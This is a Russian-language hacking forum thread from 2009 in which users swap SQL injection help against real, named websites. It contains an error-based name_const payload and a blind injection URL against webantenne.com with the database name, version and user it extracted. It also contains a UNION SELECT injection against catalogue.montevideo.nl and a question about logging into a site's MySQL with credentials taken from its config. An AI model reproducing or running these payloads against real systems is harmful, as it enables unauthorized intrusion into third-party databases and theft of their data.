 |
|
31.12.2009, 02:02
|
|
Новичок
Регистрация: 30.10.2009
Сообщений: 21
С нами:
8700457
Репутация:
24
|
|
character=12589)+and+1=(select+*+from(select+*+fro m(select+name_const((version()),14)d)+as+t+join+(s elect+name_const((version()),14)e)b)a)--+
Не совсем понял как работает эта inj (
|
|
|
31.12.2009, 04:31
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Встретился с такой проблеммой.
Прочитал конфиг одного сайта, есть логин и пасс от БД, сама БД находится на локалхосте, однако порт 3306 у этого сайта публично открыт, пытаюсь туда законнектиться и облом.
В чём может быть дело? Если порт открыт из веба, то и данные он на него по идее должен из веба принять...
|
|
|
|
31.12.2009, 05:34
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
зависит от настроек удаленного доступа
|
|
|
|
31.12.2009, 07:49
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
Значит, юзера user@% в БД не существует
|
|
|
|
31.12.2009, 08:55
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
Сообщение от Nightmarе
Встретился с такой проблеммой.
Прочитал конфиг одного сайта, есть логин и пасс от БД, сама БД находится на локалхосте, однако порт 3306 у этого сайта публично открыт, пытаюсь туда законнектиться и облом.
В чём может быть дело? Если порт открыт из веба, то и данные он на него по идее должен из веба принять...
то что порт открыт - не значит, что тебе туда можно
|
|
|
|
31.12.2009, 11:17
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
С нами:
9427499
Репутация:
22
|
|
http://webantenne.com/radio_player_1.php?id=999'
Ошибка вылазит, но раскрутить не могу Оо
|
|
|
|
31.12.2009, 13:23
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
http://webantenne.com/radio_player_1.php?id=-999+or+1=1+and+substring(version(),1,1)=3
----------------------------------
Blind MYsql system information:
----------------------------------
database(): db100436_1
version(): 3.23.58-log
user(): db100436_1@localhost
POST-method granted
|
|
|
|
31.12.2009, 17:18
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
А вот значит ещё какая вещь у меня появляется.
Нахожу SQL иньекцию, и всё как по плану, подбираю нужное количество колонок и … приехали. Как только подобрал правильное кол-во столбцов, так сразу-же выскакивает ошибка:
Код:
Unknown table 'codes' in field list
Вот SQL с примером:
http://catalogue.montevideo.nl/code.php?id=-1+union+select+1,2,3--
Количество столбцов точно 3, но ругается на неправильную таблицу и т.д… Эта ошибка встречается мне очень часто, собственно что тут можно сделать, почему так бывает, и реально ли вывести инфу из неё? |
|
|
|
31.12.2009, 17:24
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
С нами:
8829763
Репутация:
131
|
|
1)К примеру у вас 100 сайтов с .php?id=10
Сколько из них вы взломаете? Не получается у меня нифига =(
2)Как вы обнарижваете sql inj ? script.php?id=1+and+1=1
так ?
|
|
|
|
31.12.2009, 17:31
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от DeluxeS
1)К примеру у вас 100 сайтов с .php?id=10
Сколько из них вы взломаете? Не получается у меня нифига =(
2)Как вы обнарижваете sql inj ? script.php?id=1+and+1=1
так ?
Ох я ебал.Как в болталке тролить так мы в первое рыло,а как статьи почитать религия не позволяет?
Для каждого случая,отдельная диагностика,где то кавычка,где-то скобка.И нельзя вывести точную статистику сколько сайтов мы взломаем из 100, "благоприятные обстоятельства" нужны 
|
|
|
|
|
|
|
|
Здесь присутствуют: 20 (пользователей: 0 , гостей: 20)
|
|
|
|
Похожие темы
Линейный вид
